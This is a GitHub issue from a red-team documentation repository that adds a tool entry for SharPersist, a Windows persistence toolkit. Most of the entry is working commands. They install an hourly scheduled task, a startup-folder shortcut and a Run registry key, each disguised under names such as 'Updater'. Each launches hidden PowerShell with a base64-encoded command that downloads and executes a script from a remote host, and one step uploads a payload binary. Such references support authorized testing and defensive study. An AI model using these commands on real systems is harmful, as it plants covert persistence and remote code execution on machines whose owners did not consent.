search

Patrick-DE / RTT-Docs

Public repository for the techniques and tools shown on rtt.secdu.de
GNU Affero General Public License v3.0
1 stars 0 forks source link

New tool: SharPersist #86

Closed Patrick-DE closed 1 year ago

Patrick-DE commented 1 year ago 
{
  "name": "SharPersist",
  "phases": [
    "03. Host Enumeration",
    "04. Persistence"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://github.com/mandiant/SharPersist",
  "description": "Windows persistence toolkit written in C#",
  "undetected": [],
  "detected": [],
  "content": "",
  "commands": [
    {
      "id": "226ea902-b239-4fba-823e-2f485af43747",
      "name": "Help",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "`-t` is the desired persistence technique.\n`-c` is the command to execute.\n`-a` are any arguments for that command.\n`-n` is the name of the task.\n`-m` is to add the task (you can also `remove`, `check` and `list`).\n`-o` is the task frequency.\n\nStartup Folder\n`-f` is the filename to save as.\n\nRunKey\n`-k` is the registry key to modify.\n`-v` is the name of the registry key to create."
    },
    {
      "id": "6dda0d80-51eb-405a-a33e-d8c9f95f15ed",
      "name": "Create a scheduled task",
      "description": "Create a scheduled task with: Powershell x64 bit, Name: Updater, hourly execute",
      "tag": "",
      "results": [
        "COMPUTER:PERSIST:STASK"
      ],
      "cmd": "SharPersist.exe -t schtask -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==\" -n \"Updater\" -m add -o hourly"
    },
    {
      "id": "416b7318-d81f-45d9-a3c0-1c985e7a2178",
      "name": "Add to startup folder",
      "description": "Add to startup folder Creates a file called UserEnvSetup in the folowing path: %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\UserEnvSetup.lnk\n⚠ Consider the spaces in \"Start Menu\"",
      "tag": "",
      "results": [
        "COMPUTER:PERSIST:STARTUP"
      ],
      "cmd": "SharPersist.exe -t startupfolder -c \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -a \"-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgA1AC4AMQAyADAALwBhACIAKQApAA==\" -f \"UserEnvSetup\" -m add\n"
    },
    {
      "id": "976759a1-0f44-44be-b510-02be55bda50c",
      "name": "Set registrykey",
      "description": "Create a new regkey with:\n* Registry key name: Updater\n* Registry key to modify: hkcurun | hkcurunonce (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run)",
      "tag": "",
      "results": [
        "COMPUTER:PERSIST:REG"
      ],
      "cmd": "cd C:\\ProgramData\nupload C:\\Payloads\\Updater.exe\nSharPersist.exe -t reg -c \"C:\\ProgramData\\Updater.exe\" -a \"/q /n\" -k \"hkcurun\" -v \"Updater\" -m add"
    }
  ],
  "latest_commit": "2023-04-10T00:53:02Z"
}